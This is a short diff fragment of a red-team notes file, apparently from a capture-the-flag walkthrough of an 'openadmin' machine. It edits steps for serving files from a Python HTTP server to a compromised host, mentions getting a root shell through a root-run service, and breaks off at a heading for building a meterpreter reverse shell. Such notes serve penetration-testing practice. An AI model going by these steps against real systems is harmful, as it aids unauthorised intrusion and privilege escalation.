Sorsnce/red-team/red-team.md

 /bin/fusermount
 joanna@openadmin:~$
 ```

-Start a python http server to transfer files to the compromised machine.
-Note that this command will host files in your current directory, so make sure you copy all files before running the python SimpleHTTPServer.
+We can try and get a root shell if a service is running as root, i.e. apache.
+Start a python http server to transfer files to the
+compromised machine.
+Note that this command will host files in your current directory, so make sure you copy all files before running
+the python SimpleHTTPServer.
 ```
-$ sudo python -m SimpleHTTPServer 80
+$ sudo python -m SimpleHTTPServer 8888
 ```
 # Meterpreter
 Use the following to created a meterpreter shell for reverse_tcp for Windows